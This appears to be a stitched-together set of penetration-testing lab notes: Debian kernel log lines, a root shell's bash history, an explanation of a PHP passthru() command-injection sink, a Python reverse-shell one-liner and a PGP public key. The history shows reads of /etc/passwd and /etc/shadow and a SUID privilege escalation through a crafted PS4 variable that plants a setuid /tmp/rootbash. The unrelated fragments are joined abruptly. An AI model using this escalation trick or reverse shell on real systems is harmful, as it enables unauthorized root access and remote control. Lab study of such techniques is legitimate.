1387Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1388Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1389Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1390Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1391Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1392Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1393Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1394Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1395Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1396Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1397Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1398Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1399Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1400Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1401Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1402Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1403Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1404Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1405Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1406Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1407Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1408Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1409Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1410Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1411Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1412Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1413Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1414Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1415Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1416Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1417Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1418Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1419Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1420Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1421Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1422Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1423Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1424Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1425Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1426Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1427Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1428Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1429Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1430Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1431Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1432Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1433Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1434Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1435Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1436Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1437Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1438Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1439Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1440Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1441Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1442Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1443Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1444Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1445Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1446Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1447rootbash-4.1# history | tail -100
1448 115 ls
1449 116 cat /etc/hosts.allow
1450 117 arp -A
1451 118 arp
1452 119 arp -vpn
1453 120 arp -vn
1454 121 netstat -A
1455 122 netstat -r
1456 123 netstat -i
1457 124 netstat -g
1458 125 netstat -e
1459 126 netstat -l
1460 127 netstat
1461 128 man netstat
1462 129 netstat -tcp
1463 130 netstat -udp
1464 131 netstat -p tcp
1465 132 netstat -p udp
1466 133 netstat -p tcp 22
1467 134 netstat -p 22
1468 135 netstat -p 80
1469 136 netstat -p tcp
1470 137 netstat -p udp
1471 138 ls
1472 139 clear
1473 140 dmesg | grep /var/log
1474 141 dmesg | grep /var/log/messages.log
1475 142 cd /var/log
1476 143 ls
1477 144 dmesg | grep /var/log/syslog | less
1478 145 dmesg | grep /var/log/syslog | more
1479 146 dmesg | grep /var/log/syslog
1480 147 ls -la /var/log/syslog
1481 148 chmod 755 /var/log/syslog
1482 149 ls -la /var/log/syslog
1483 150 ls
1484 151 tail -f /var/log/syslog
1485 152 tail -f /var/log/syslog | more
1486 153 dmesg | grep /var/log/syslog > w0rd.txt
1487 154 cat w0rd.txt
1488 155 ls
1489 156 chmod 755 w0rd.txt
1490 157 ls
1491 158 cat w0rd.txt
1492 159 ls -la w0rd.txt
1493 160 rm -f w0rd.txt
1494 161 ls
1495 162 cat /var/log/syslog
1496 163 cat /var/log/syslog | less foo.txt
1497 164 cat /var/log/syslog | grep /usr/local/bin
1498 165 cat /var/log/syslog | grep /tmp
1499 166 cat /var/log/syslog | grep /rootbash
1500 167 ls
1501 168 cat /var/log/syslog
1502 169 ls
1503 170 dmesg /var/log/auth.log.2.gz
1504 171 cat /var/log/wtmp
1505 172 cat /var/run/utmp
1506 173 who am i
1507 174 users
1508 175 last
1509 176 finger
1510 177 cat /var/log/secure
1511 178 cat /var/log/auth.log
1512 179 head -5 /var/log/auth.log
1513 180 fc -l -10
1514 181 nano .bash_history
1515 182 history 100
1516 183 ls -la
1517 184 who am i
1518 185 cd /
1519 186 ls
1520 187 cd /home
1521 188 ls
1522 189 cd user/
1523 190 ls
1524 191 cd ..
1525 192 ls
1526 193 cat /etc/passwd
1527 194 cat /etc/shadow
1528 195 exit
1529 196 /usr/local/bin/suid-env2
1530 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1531 198 /tmp/rootbash -p
1532 199 exit
1533 200 cls
1534 201 exit
1535 202 ls
1536 203 cd tools
1537 204 ls
1538 205 /tmp/rootbash -p
1539 206 exit
1540 207 su newroot
1541 208 whoami
1542 209 cat /etc/passwd
1543 210 su root
1544 211 exit
1545 212 tail -f /var/log/messages
1546 213 cat /var/log/messages
1547 214 history | tail -100
1548rootbash-4.1# id
1549uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1550rootbash-4.1# whoami
1551root
1552rootbash-4.1# ls -la /home/user/bmillakid
1553rootbash-4.1# cd /home
1554rootbash-4.1# ls
1555user
1556rootbash-4.1# cd user
1557rootbash-4.1# ls
1558l33t.txt myvpn.ovpn tools
1559rootbash-4.1#
15771. The script checks whether the request parameter "commandString" is set.
1578
15792. If it is, then the variable $command_string gets what was passed into the input field
1580
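15813. The program then enters a try block and calls passthru($command_string). The documentation for passthru() is on PHP's website; in short, it executes whatever was entered into the input field as a system command and passes the raw output directly back to the browser. Because the command string comes straight from the request (steps 1 and 2), this call is a command-injection sink: request input should never reach passthru() without a strict allow-list of permitted commands.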
1582
15834. If the try block does not succeed, the error is output to the page. In practice this generally prints nothing, because the command's stderr is not passed back to the browser; the catch is there because PHP does not allow a try without a catch (or finally) block.
1584
1585
1586
1587reverse shell
1588http://10.10.202.91:8888/
1589/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1590ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1599-----BEGIN PGP PUBLIC KEY BLOCK-----
1600Comment: https://keybase.io/download
1601Version: Keybase Go 5.6.0 (windows)
1602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1650=QLLF
1651-----END PGP PUBLIC KEY BLOCK-----